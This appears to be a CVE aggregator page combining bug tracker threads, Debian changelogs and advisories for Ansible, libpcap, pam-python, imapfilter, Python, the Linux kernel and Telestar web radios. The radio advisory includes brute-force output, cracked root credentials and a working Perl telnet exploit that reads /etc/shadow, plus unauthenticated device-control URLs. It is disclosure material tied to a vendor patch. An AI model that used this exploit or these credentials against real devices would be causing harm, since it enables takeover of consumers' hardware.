In Ansible, all Ansible Engine versions up to ansible-engine 2.8.5, ansible-engine 2.7.13, ansible-engine 2.6.19, were logging at the DEBUG level which lead to a disclosure of credentials if a plugin used a library that logged credentials at the DEBUG level. This flaw does not affect Ansible modules, as those are executed in a separate process.

Description Borja Tarraso 2019-09-25 11:33:47 UTC

Secrets are disclosed on logs due to display is hardcoded to DEBUG level. This causes 'no\_log’ parameter is ignored on tasks.

Comment 4 Borja Tarraso 2019-10-08 07:18:26 UTC

Acknowledgments:

Name: Paul Milbank (Pushpay Site Reliability Engineering), Harvey Rendell (Pushpay Site Reliability Engineering), Tom Henderson (Pushpay Site Reliability Engineering)

Comment 5 Salvatore Bonaccorso 2019-10-09 13:10:59 UTC

Hi

Is there any related upstream issue related to this issue or further information? The dependent issues are currently not accessible and we would like to determine which ansible versions in Debian are affected by this CVE.

Regards,
Salvatore

Comment 14 Hardik Vyas 2019-11-06 05:14:11 UTC

Statement:

Red Hat Gluster Storage no more maintains its own version of Ansible, pre-requisite is to enable ansible repository. The fix will be consumed from core Ansible.

Comment 24 Yadnyawalk Tale 2020-04-22 10:21:56 UTC

Red Hat CloudForms 5.10 (4.7) and 5.11 (5.0) do not ship \`ansible\` package, it is provided by the official Ansible repository.

CVE-2019-14846: secrets disclosed on logs when no_log enabled

sf-pcapng.c in libpcap before 1.9.1 does not properly validate the PHB header length before allocating memory.

CVE-2019-15165: libpcap/CHANGES at libpcap-1.9 · the-tcpdump-group/libpcap

pam-python before 1.0.7-1 has an issue in regard to the default environment variable handling of Python, which could allow for local root escalation in certain PAM setups.

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Wed, 18 Sep 2019 20:25:13 +1000
Source: pam-python
Binary: libpam-python libpam-python-dbgsym libpam-python-doc
Architecture: source amd64 all
Version: 1.0.7-1
Distribution: unstable
Urgency: high
Maintainer: Russell Stuart <russell-debian@stuart.id.au>
Changed-By: Russell Stuart <russell-debian@stuart.id.au>
Description:
 libpam-python - Enables PAM modules to be written in Python
 libpam-python-doc - Documentation for the bindings provided by libpam-python
Changes:
 pam-python (1.0.7-1) unstable; urgency=high
 .
   \* New upstream.
Checksums-Sha1:
 13792bdb8286d2942a90e9e83cd6b8e427f108bd 1961 pam-python\_1.0.7-1.dsc
 f2c303011b3cd61a88d3fcab845c30ceac46356c 47487 pam-python\_1.0.7.orig.tar.gz
 328aac8c65742534bb70fffadc44b3ff39821bc4 14444 pam-python\_1.0.7-1.debian.tar.xz
 8169b63698dd49bdc72969d683925fa3c8194482 49544 libpam-python-dbgsym\_1.0.7-1\_amd64.deb
 7342e17ce735c164b9ab51469924db1b02a2860e 54216 libpam-python-doc\_1.0.7-1\_all.deb
 ad04838c6c47b83fc7684431a9b5a1b483ccd2fc 29736 libpam-python\_1.0.7-1\_amd64.deb
 fac1721938134d71f53e1612fc5cfaa5ecf1bad7 8375 pam-python\_1.0.7-1\_amd64.buildinfo
Checksums-Sha256:
 a17b6b97a8595d2a7c675d2ad2ffcc5bdb758a1d110366e966928e7cea05a5b7 1961 pam-python\_1.0.7-1.dsc
 96ce72fe355b03b87c0eb540ecef06f33738f98f56581e81eb5bffbad1a47e07 47487 pam-python\_1.0.7.orig.tar.gz
 e0347d1fbd8ef513b0ffab295d9a21af85023db57570f4376ac0e14bd0f97b42 14444 pam-python\_1.0.7-1.debian.tar.xz
 46895904cfca2594b5907c1df54ace39aeba2c4bfc16c8336b8c9745bff445d6 49544 libpam-python-dbgsym\_1.0.7-1\_amd64.deb
 8b855eacf01205c7c0ebcb606d6263d0e9936b036f0a21e867949a48e5389b65 54216 libpam-python-doc\_1.0.7-1\_all.deb
 b8ebf514996c4082e942a30c21e03408351454729b70a84724e567be39617ed4 29736 libpam-python\_1.0.7-1\_amd64.deb
 892564dae6899af1704003a85b5e895d00330bb027a1dbd8fb4beeabd9b468ae 8375 pam-python\_1.0.7-1\_amd64.buildinfo
Files:
 043ab8fd69c3bc5099c16e0bdaf24208 1961 admin optional pam-python\_1.0.7-1.dsc
 55153c1a8015a7ede87985fa6816db78 47487 admin optional pam-python\_1.0.7.orig.tar.gz
 1729d21155d32bd146088f4210f410ab 14444 admin optional pam-python\_1.0.7-1.debian.tar.xz
 2ab74a8d5fcd74b655b059b76b8d9670 49544 debug optional libpam-python-dbgsym\_1.0.7-1\_amd64.deb
 942bc7e6443aac9c0eaca34d89db04be 54216 doc optional libpam-python-doc\_1.0.7-1\_all.deb
 07d1730fbb343a85a8c52ce6d1c3d69f 29736 admin optional libpam-python\_1.0.7-1\_amd64.deb
 9e7c02ea01afe05cb1441ff137cd469c 8375 admin optional pam-python\_1.0.7-1\_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEZqiOeH6lCkTWvjmorNSfiF5UUm4FAl2GJgwACgkQrNSfiF5U
Um6qRw//YB6R1EoUlm6/Ox+JBrM8XdzupdBBlT94qtS3C68m9G9mkFBjLo/ANUNv
td4DpGewVHQPg8lUp9+gHvRFCNFyLwjo1xCk/1DCyfZuLvIic/WB279M/Ylsv0ay
GKLeEJyc6Beq6ISazgwD0ErdLC6S4SBJvaewz/7D/PnK8HeB2ZZOt5knwmELJq++
E870ZH8LDIzzkQ6DR/Ae0308ho7wVREOICM1lDIbuYaKro2+rmDPr3+cgCTfW7BM
hagaFG2SMmKnJ2oT35meLGGL6fFX2vuJ+9VVkObSmYrY1RyCnAAHbd8cPOtQ/sPP
97xUSKydJOdvuKWveKG2+1WkSpbwMAcAuoqPBAUKkVHWLMdw7vURNwM9RVPLxbea
noAU3aUzNTDidBNnkskTbGmu75XI2xqc6xJceXaXnszu70p8TUKwU9lDmLMNdUWj
UkHJsbl6mONojIoy9L9fLdINOb6TZNS7/kgiiE7eMHizRi8zVXtsmDRXDrnhom7A
ldAhc7091eT3XICLtk30g/FUHdubcDRCWnc3lpaKx3GNVcztS8UZhbhWMZGytkWe
GUlrRyRDTkyt+hStKc9t524h/WxSytFq8Pn+EKnleI+wWGbGs0h6FU3UortaCFZC
ngwEHFqdsPvRVAZPXKkvm/HNgSTkqdmlDv3LIkXTyxi04ktXMRI=
=sYh5
-----END PGP SIGNATURE-----

CVE-2019-16729: Debian Package Tracker

In the Linux kernel before 5.2.14, rds6_inc_info_copy in net/rds/recv.c allows attackers to obtain sensitive information from kernel stack memory because tos and flags fields are not initialized.

CVE-2019-16714

TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands.

Document Title: =============== Dabman & Imperial (i&d) - Multiple Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get\_content.php?id=2183 Video: https://www.vulnerability-lab.com/get\_content.php?id=2190 Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474 CVE-ID: ======= CVE-2019-13473 Release Date: ============= 2019-09-09 Vulnerability Laboratory ID (VL-ID): ==================================== 2183 Common Vulnerability Scoring System: ==================================== 9.9 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 10.000€ - 25.000€ Product & Service Introduction: =============================== Since 1993, TELESTAR has been synonymous with quality and a very good price/performance ratio in the consumer electronics segment. TELESTAR-DIGITAL GmbH distributes high-quality reception technology for digital TV reception via satellite (DVB-S), cable (DVBC) or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region of Germany. The product portfolio includes digital receivers and the latest generation of television sets as well as modern distribution and single-cable technology, satellite to IP reception solutions and radio transmission systems. The product range is rounded off by Germany's most comprehensive range of accessories for digital television reception. (Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh ) Abstract Advisory Information: ============================== The vulnerability laboratory research team discovered multiple vulnerabilities in the dabman and imperial web radio devices series (typ d & i). Vulnerability Disclosure Timeline: ================================== 2019-06-01: Researcher Notification & Coordination (Security Researcher) 2019-06-02: Vendor Notification (Telestar Digital Data Security Department) 2019-06-07: Vendor Response/Feedback (Telestar Digital Data Security Department) 2019-08-30: Vendor Fix/Patch (Service Developer Team) 2019-09-08: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Critical Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= No User Interaction Disclosure Type: ================ Coordinated Disclosure Technical Details & Description: ================================ 1.1 The dabman and imperial manufactured web radio series (typ d & i) suffers from a weak password vulnerability. The vulnerabilites allows local and remote attackers to compromise the web radios full embedded linux busybox os. The vulnerability is located within an undocumented telnet service (telnetd) of the linux busybox and is turned permanently on. The telnetd service uses weak passwords with hardcoded credentials on the local embedded linux busybox of the internet radio devices. The telnet password can be cracked by usage of simple manual password bruteforce technics or by basic automated attacks with scripts (exp. ncrack). After receiving the password the remote or local network attacker can unauthorized login to the internet radio device to use the embedded linux busybox operating system. After the attacker has been logged in as root user, he can open the /etc/ path to cat gshadow, shadow and the conf files. At the end the attacker has finally full root access on the busybox (telnetd), he can access the web-server (httpd) as admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg. A demo exploit poc is available in the wild. Due to some deeper researcher we identified also another manufacturer that uses the same typ of default manufactured system. The same undocumented telnet service was uncovered during the analysis. The manufacturer is still processing a patch. Vulnerable Protocol(s): \[+\] telnetd System(s): \[+\] BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) (Debian Linux PreRelease - ARM 3.3.2) Firmware Version(s): \[+\] TN81HH96-g102h-g102 Manufacturer: Telestar Digital Gmbh Affected Version(s): \[+\] Bobs Rock Radio \[+\] Dabman D10 \[+\] Dabman i30 Stereo \[+\] Imperial i110 \[+\] Imperial i150 \[+\] Imperial i200 \[+\] Imperial i200-cd \[+\] Imperial i400 \[+\] Imperial i450 \[+\] Imperial i500-bt \[+\] Imperial i600 1.2 The dabman and imperial manufactured web radio series (typ d & i) suffers from a command execution vulnerability. The vulnerability allows local and remote attackers unauthorized and unauthenticated send commands to comprimise the web radio devices. The vulnerability is located httpd web-server communcation on port 80 and 8080. Local and remote attackers can send basic GET commands with basic command line tools (exp. curl or modhttp) to modify or manipulate http requests. The attacker can also capture the http airmusic commands to reverse engineer the radio device for unauthorized interactions. The system has no protection mechanism to block unauthorized transmit of commands. The web radio as well not owns an auth or reminder mechanism to ensure only allowed or trusted sources can transmit the commands (client, system, mac , auth ...). Vulnerable Protocol(s): \[+\] httpd Module(s): \[+\] UIData (Web UI on 80 or 8080) Function(s): \[+\] /set\_dname \[+\] /mylogo \[+\] /LocalPlay \[+\] /LocalPlay \[+\] /irdevice.xml \[+\] /Sendkey \[+\] /setvol \[+\] /hotkeylist \[+\] /init \[+\] /playlogo.jpg \[+\] /stop \[+\] /exit \[+\] /back \[+\] /playinfo Parameter(s): \[+\] ?name= \[+\] ?url=./\*.jpg \[+\] ?url=/stream.wav&name=\* \[+\] ?url=/msg.wav&save=\* \[+\] ?key=\* \[+\] ?vol=\*0&mute=\* \[+\] ?language=\* Affected Function(s): \[+\] Air Music Controls Manufacturer: Telestar Digital Gmbh Affected Version(s): \[+\] Bobs Rock Radio \[+\] Dabman D10 \[+\] Dabman i30 Stereo \[+\] Imperial i110 \[+\] Imperial i150 \[+\] Imperial i200 \[+\] Imperial i200-cd \[+\] Imperial i400 \[+\] Imperial i450 \[+\] Imperial i500-bt \[+\] Imperial i600 Proof of Concept (PoC): ======================= 1.1 Undocumented Telnet Service (telnetd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. Nmap Portscan Scanning R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) \[1000 ports\] Discovered open port 8080/tcp on 93.234.141.215 Discovered open port 80/tcp on 93.234.141.215 Discovered open port 23/tcp on 93.234.141.215 Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports) Initiating Service scan at 14:48 Scanning 3 services on R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host) Initiating OS detection (try #1) against R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) NSE: Script scanning 93.234.141.215. Initiating NSE at 14:48 Completed NSE at 14:49, 30.61s elapsed Initiating NSE at 14:49 Completed NSE at 14:49, 0.00s elapsed Nmap scan report for R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) Host is up (0.010s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet security DVR telnetd (many brands) 80/tcp open tcpwrapped |\_http-title: AirMusic 8080/tcp open http BusyBox httpd 1.13 | http-methods: |\_ Supported Methods: GET |\_http-title: 404 Not Found MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux\_kernel:2.6 OS details: Linux 2.6.16 - 2.6.35 (embedded) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=197 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel NCrack \[telnetd\] (ncrack -v --user root \[IP\]:\[PORT\]) C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23 Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21 Mitteleuropõische Sommerzeit Discovered credentials on telnet://93.234.141.215:23 'root' 'password' Discovered credentials on telnet://93.234.141.215:23 'root' 'password1' Discovered credentials on telnet://93.234.141.215:23 'root' 'password2' Discovered credentials on telnet://93.234.141.215:23 'root' 'password123' Discovered credentials on telnet://93.234.141.215:23 'root' 'password12' Discovered credentials on telnet://93.234.141.215:23 'root' 'password3' Discovered credentials on telnet://93.234.141.215:23 'root' 'password!' telnet://93.234.141.215:23 finished. Too many failed attemps. Discovered credentials for telnet on 93.234.141.215 23/tcp: 93.234.141.215 23/tcp telnet: 'root' 'password' 93.234.141.215 23/tcp telnet: 'root' 'password1' 93.234.141.215 23/tcp telnet: 'root' 'password2' 93.234.141.215 23/tcp telnet: 'root' 'password123' 93.234.141.215 23/tcp telnet: 'root' 'password12' 93.234.141.215 23/tcp telnet: 'root' 'password3' 93.234.141.215 23/tcp telnet: 'root' 'password!' Ncrack done: 1 service scanned in 273.29 seconds. Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117 Ncrack finished. System: BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) Kernel: 9)20151217\_M8\_TFT\_7601\_Kernel OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini. rodata.ARM.extab.ARM.exidx.eh\_frame.init\_array. fini\_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes Built-in commands: . : \[ \[\[ bg break cd chdir continue echo eval exec exit export false fg hash help jobs kill local printf pwd read readonly return set shift source test times trap true type ulimit umask unset wait Currently defined functions: \[, \[\[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput, gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc, login, ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod, route, run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc, udhcpd, umount, unlzma, usleep, zcat Username: root Password: password & password! shadow root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey) ftp:!:0:::::: (decrypted: empty/blank) usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond) gshadow root:::root,mldonkey PoC: Exploit use Net::Telnet (); use Cwd; $file="inputLog.txt"; $ofile="outputlog.txt"; # For local network change to localhost or local ip @hosts = ("93.234.141.215"); foreach $hostip (sort @hosts) { $t = new Net::Telnet (Timeout => 10, Input\_log => $file, Prompt => "/>/"); print "nnConnecting to undocumented Telnet Service of Imperial or Dabman Web Radio Service: $hostip ...n"; print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150, i200, i200-cd, i400, i450, i500-bt, i600n"; $t->open("$hostip"); $t->login("root","password"); my @lines = $t->cmd('cat /etc/shadow'); print "$hostip: Directories:n"; print "@lines n"; $t->close; } 1.2 AirMusic Unauthenticated Command Execution (httpd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. AirMusic Status Interface: http://93.234.141.215:80 Web-Server HTTPD UIData Path: http://93.234.141.215:8080 Note: Attacks can be performed in the local network (Localhost:80) or remotly by requesting the url remote ip adress (93.234.141.215) + forwarded remote port(Standard :23). Get device name from Device http://93.234.141.215:80/irdevice.xml Set device name http://93.234.141.215:80/set\_dname?name=PWND Set boot-logo (HTTP URL, requirement: JPG) http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg Display or retrieve channel logo http://93.234.141.215:80:8080/playlogo.jpg Changing the main menu with the selected language http://93.234.141.215:80/init?language=us Play stream http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME Save audio file as message http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1 Recall channel hotkeys http://93.234.141.215:80/hotkeylist Current playback data http://93.234.141.215:80/playinfo Set volume from 0-31 & mute function http://93.234.141.215:80/setvol?vol=10&mute=0 Reset http://93.234.141.215:80/back Set stop http://93.234.141.215:80/stop Activate all back http://93.234.141.215:80/exit Send keystroke combo http://93.234.141.215:80/Sendkey?key=3 PoC: Exploit Dabman & Imerpial - HTML AutoPwner PoC: Checker for Modifications #!/usr/bin/perl use strict; use warnings; use LWP::Simple; my $url1 = 'http://93.234.141.215:80/'; my $source1 = get( $url1 ); my $url2 = 'http://93.234.141.215:80/'; my $source2 = get( $url2 ); print $source1; print $source1; Solution - Fix & Patch: ======================= A fresh updated version is available by the manufacturer telestar digital gmbh to resolve the vulnerabilities in all i & d series products. It is recommended to install the updates as quick as possible to ensure the digital security. Manual steps to update: 1. Set the device to the factory setting 2. Select language 3. Switch off the device 4. Switch on the device 5. Network setup 6. Wait for "New Software" message 7. Press OK to start the update 8. Updated Version: TN81HH96-g102h-g103\*\*a\*-fb21a-3624 Security Risk: ============== The security risk of the vulnerabilities in the online web radio with wifi and user interface are estimated as critical. The vulnerability can be exploited by local attackers in a network or by remote attackers without user interaction or further privileged user accounts. The potential of the issue being exploited in thousends of end user devices all over europe is estimated as high. The issue has the potential that could be used by remote attackers for spreading randomware / malware, mass defacements, compromises for further linux network attacks or being part of a criminal acting iot botnet. Credits & Authors: ================== Benjamin K.M. \[VULNERABILITY LAB - CORE RESEARCH TEAM\] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln\_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss\_upcoming.php vulnerability-lab.com/rss/rss\_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2019 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

CVE-2019-13474: Dabman & Imerpial - HTML AutoPwner

IMAPFilter through 2.6.12 does not validate the hostname in an SSL certificate.

**Debian Bug report logs - #939702  
imapfilter: CVE-2016-10937: does not validate hostname**

Toggle useless messages

**Report forwarded** to debian-bugs-dist@lists.debian.org, team@security.debian.org, team@security.debian.org, Francesco Paolo Lovergine <frankie@debian.org>:  
Bug#939702; Package imapfilter. (Sat, 07 Sep 2019 21:48:04 GMT) (full text, mbox, link).

**Acknowledgement sent** to Quentin Hibon <qh.public@yahoo.com>:  
New Bug report received and forwarded. Copy sent to team@security.debian.org, team@security.debian.org, Francesco Paolo Lovergine <frankie@debian.org>. (Sat, 07 Sep 2019 21:48:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: imapfilter
Version: 1:2.6.12-1
Severity: grave
Tags: security upstream
Justification: user security hole

Dear maintainer,

imapfilter does not validate the hostname while validating the 
certificate, as explained in the upstream issue:

https://github.com/lefcha/imapfilter/issues/142

-- System Information:
Debian Release: 10.1
 APT prefers stable-updates
 APT policy: (500, 'stable-updates'), (500, 'stable'), (90, 'testing'), (80, 'stable'), (70, 'testing'), (60, 'unstable'), (50, 'unstable')
Architecture: amd64 (x86\_64)

Kernel: Linux 4.19.0-5-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT\_OOT\_MODULE, TAINT\_UNSIGNED\_MODULE
Locale: LANG=en\_US.UTF-8, LC\_CTYPE=en\_US.UTF-8 (charmap=UTF-8), LANGUAGE=en\_US:en (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages imapfilter depends on:
ii  libc6        2.28-10
ii  liblua5.2-0  5.2.4-1.1+b2
ii  libpcre3     2:8.39-12
ii  libssl1.1    1.1.1c-1

imapfilter recommends no packages.

imapfilter suggests no packages.

-- no debconf information

**Changed Bug title to 'imapfilter: CVE-2016-10937: does not validate hostname' from 'imapfilter: does not validate hostname'.** Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 08 Sep 2019 19:00:07 GMT) (full text, mbox, link).

**Information forwarded** to debian-bugs-dist@lists.debian.org, team@security.debian.org, Francesco Paolo Lovergine <frankie@debian.org>:  
Bug#939702; Package imapfilter. (Mon, 16 Sep 2019 21:33:03 GMT) (full text, mbox, link).

**Acknowledgement sent** to Quentin Hibon <qh.public@yahoo.com>:  
Extra info received and forwarded to list. Copy sent to team@security.debian.org, Francesco Paolo Lovergine <frankie@debian.org>. (Mon, 16 Sep 2019 21:33:03 GMT) (full text, mbox, link).

Message #14 received at 939702@bugs.debian.org (full text, mbox, reply):

Dear maintainer,

a fix is now available for this vulnerability:

https://github.com/lefcha/imapfilter/commit/bf2515da752eddd54973adb0853c6aa289e921b6

**Added tag(s) fixed-upstream.** Request was from debian-bts-link@lists.debian.org to control@bugs.debian.org. (Thu, 19 Sep 2019 19:51:07 GMT) (full text, mbox, link).

**Reply sent** to Sylvestre Ledru <sylvestre@debian.org>:  
You have taken responsibility. (Wed, 25 Sep 2019 15:45:09 GMT) (full text, mbox, link).

**Notification sent** to Quentin Hibon <qh.public@yahoo.com>:  
Bug acknowledged by developer. (Wed, 25 Sep 2019 15:45:09 GMT) (full text, mbox, link).

Message #21 received at 939702-close@bugs.debian.org (full text, mbox, reply):

Source: imapfilter
Source-Version: 1:2.6.13-1

We believe that the bug you reported is fixed in the latest version of
imapfilter, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 939702@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sylvestre Ledru <sylvestre@debian.org> (supplier of updated imapfilter package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Wed, 25 Sep 2019 16:10:51 +0200
Source: imapfilter
Architecture: source
Version: 1:2.6.13-1
Distribution: unstable
Urgency: medium
Maintainer: Francesco Paolo Lovergine <frankie@debian.org>
Changed-By: Sylvestre Ledru <sylvestre@debian.org>
Closes: 939702
Changes:
 imapfilter (1:2.6.13-1) unstable; urgency=medium
 .
   \* New upstream release
     - Validates the hostname (Closes: #939702)
Checksums-Sha1:
 286821cde8cf2d080be8296bdf5b6a8f2f2f593f 1948 imapfilter\_2.6.13-1.dsc
 94fed16e7902d3eb8d58194e964a7b5742f9e11d 59467 imapfilter\_2.6.13.orig.tar.gz
 d24defbbbd71ea5943f675d38f8148a6f68f6e63 5384 imapfilter\_2.6.13-1.debian.tar.xz
 34ee504c315e4b418387058ea77394463c631f56 6017 imapfilter\_2.6.13-1\_amd64.buildinfo
Checksums-Sha256:
 1b0885268245947ca5bc85a32c293cd02f634bfd073259d0393f6808dc08bb8c 1948 imapfilter\_2.6.13-1.dsc
 8ad94b94ddd47bd051ec875a3ba347bf3427f98ca4b63d60f38ea3a704c8afb2 59467 imapfilter\_2.6.13.orig.tar.gz
 1287875fb904d964b452e8a3a9e7a06e09f750b043a2738a3325975e0bcc65d6 5384 imapfilter\_2.6.13-1.debian.tar.xz
 ac6c4184cf643778c89d0b77c7db01aaebc6f3801bc02abda832bc3a83fb8b75 6017 imapfilter\_2.6.13-1\_amd64.buildinfo
Files:
 a29bff9ac31efef4bc1b3271723d3d12 1948 mail optional imapfilter\_2.6.13-1.dsc
 6398609530556a4e52a0bae0d438a833 59467 mail optional imapfilter\_2.6.13.orig.tar.gz
 2ab3fcc00aa5b27891f3f0a8f5e6a8ac 5384 mail optional imapfilter\_2.6.13-1.debian.tar.xz
 197c142788bb2ade2aca9c5f499ffe72 6017 mail optional imapfilter\_2.6.13-1\_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEtg21mU05vsTRqVzPfmUo2nUvG+EFAl2LfdkACgkQfmUo2nUv
G+Gf0w/7BkKkPx0EfnsBaORm2qGCabznOCWZNQJZkpdhXnLGy1pHjt3OoDw9aEBM
AfYAm9jRL8KQ/BqnkbsV1kPohO84GIXMVdHw/DxxnO6/KMMiutF3hGRk8guarkr1
r3LSxVuzWc+ycfFxfWehNxu/EV4umTtL2Qq+ve4Q4tj4LG+ipXgxxyn6SokmiPoa
WFLB2bwywVaQI3lv5Xv5NqV17YMZC2waVogeUOY2AjwTl0GeDKPUUEN+PajDFNvB
Ew1tQik59AwcG1KwDioR9+0sIxpO7p7Rsr1NHCXCp1UzTC9ikFHVWyLcwD4mMqtf
uUdN41GUBMvVrN7HDszbWCzYmozWX0uOq29JFF2qLzpcl7EfORvyYI9AuPZkhSaO
8fXqka0aR10CqihR92N9Fl9TK69Wqbdrtac8JdmLPgIA8BhCSpx464BV8MuhuEOr
Da+hS8yYkkhtCCKGnGhDLlhkndMHN7SUgNZSPDOUkQJAI5Al/j7q5v/R51K8+SSZ
WLW+5mSQdTlOyKHdoM22IS8bB4qwXd9qAUcGxpOBMhm/pZxGfI22n4BWNmQ3DxUD
SDLjYfVxMAvB/JBHWBo2cQq2qU/xHP7hoYVS/C4kzhNetkTnECQX9vcBbbI0ZGjZ
d/Yfz5qi4r9ACVJZ5jpEANhGTJwAinWY2oDzyWG8ZPjPNFDbM9Y=
=28UH
-----END PGP SIGNATURE-----

**Bug archived.** Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 12 Sep 2021 07:25:18 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Thu Feb 16 03:05:56 2023; Machine Name: bembo

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2016-10937: #939702 - imapfilter: CVE-2016-10937: does not validate hostname

An issue was discovered in Python through 2.7.16, 3.x through 3.5.7, 3.6.x through 3.6.9, and 3.7.x through 3.7.4. The email module wrongly parses email addresses that contain multiple @ characters. An application that uses the email module and implements some kind of checks on the From/To headers of a message could be tricked into accepting an email address that should be denied. An attack may be the same as in CVE-2019-11340; however, this CVE applies to Python more generally.

CVE-2019-16056: Issue 34155: [CVE-2019-16056] email.utils.parseaddr mistakenly parse an email

Live555 before 2019.08.16 has a Use-After-Free because GenericMediaServer::createNewClientSessionWithId can generate the same client session ID in succession, which is mishandled by the MPEG1or2 and Matroska file demultiplexors.

CVE-2019-15232

An issue was discovered in the Linux kernel before 5.0.14. There is a NULL pointer dereference caused by a malicious USB device in the drivers/usb/misc/yurex.c driver.

CVE-2019-15216

An issue was discovered in the Linux kernel before 5.2.8. There is a NULL pointer dereference caused by a malicious USB device in the sound/usb/helper.c (motu_microbookii) driver.

Tag

#debian